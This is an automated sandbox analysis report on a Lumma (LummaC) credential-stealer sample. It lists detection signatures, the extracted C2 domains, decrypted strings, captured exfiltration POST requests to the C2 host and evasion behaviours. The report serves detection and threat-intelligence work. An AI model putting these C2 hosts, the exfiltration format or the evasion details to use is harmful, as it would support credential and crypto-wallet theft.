Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543431
MD5:05b1942e139d61a022f421bdd45a33bb
SHA1:94b79e3e26b7ee47e8931720db0503e01d1b6070
SHA256:f75e3f83ef5ddb3809cbef6aab8ba643f1570564aceafdd7a99dcdc11d7e89c7
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5536 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 05B1942E139D61A022F421BDD45A33BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["founpiuer.store", "thumbystriw.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "scriptyprefej.store", "navygenerayk.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2208047140.0000000001062000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2182520412.0000000001061000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2207678543.0000000001061000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T21:06:18.315174+010020546531A Network Trojan was detected192.168.2.549704104.21.95.91443TCP
              2024-10-27T21:06:19.528364+010020546531A Network Trojan was detected192.168.2.549705104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T21:06:18.315174+010020498361A Network Trojan was detected192.168.2.549704104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T21:06:19.528364+010020498121A Network Trojan was detected192.168.2.549705104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-27T21:06:20.828100+010020480941Malware Command and Control Activity Detected192.168.2.549706104.21.95.91443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.5536.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "thumbystriw.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "scriptyprefej.store", "navygenerayk.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 44%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49733 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.95.91:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Joe Sandbox ViewIP Address: 104.21.95.91 104.21.95.91
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1258Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569007Host: crisiwarny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269401849.0000000001007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000003.2238064199.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/
              Source: file.exe, 00000000.00000002.2277498147.0000000000FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/=
              Source: file.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/_y
              Source: file.exe, 00000000.00000003.2251179083.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
              Source: file.exe, 00000000.00000002.2277964213.000000000107D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apiFT
              Source: file.exe, 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apie
              Source: file.exe, 00000000.00000003.2238094568.0000000001083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apifeM
              Source: file.exe, 00000000.00000002.2277987160.0000000001083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apii
              Source: file.exe, 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apila
              Source: file.exe, 00000000.00000003.2223402187.00000000057A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apiz
              Source: file.exe, 00000000.00000002.2277498147.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/o
              Source: file.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/p
              Source: file.exe, 00000000.00000002.2277987160.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269328476.000000000108B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/roxy-Authenticat
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49733 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106B5FE0_3_0106B5FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106B5FE0_3_0106B5FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106B5FE0_3_0106B5FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106B5FE0_3_0106B5FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106B5FE0_3_0106B5FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106B5FE0_3_0106B5FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0106B5FE0_3_0106B5FE
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.998114224137931
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2194529804.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057A5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182838419.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194888793.00000000057B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 44%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
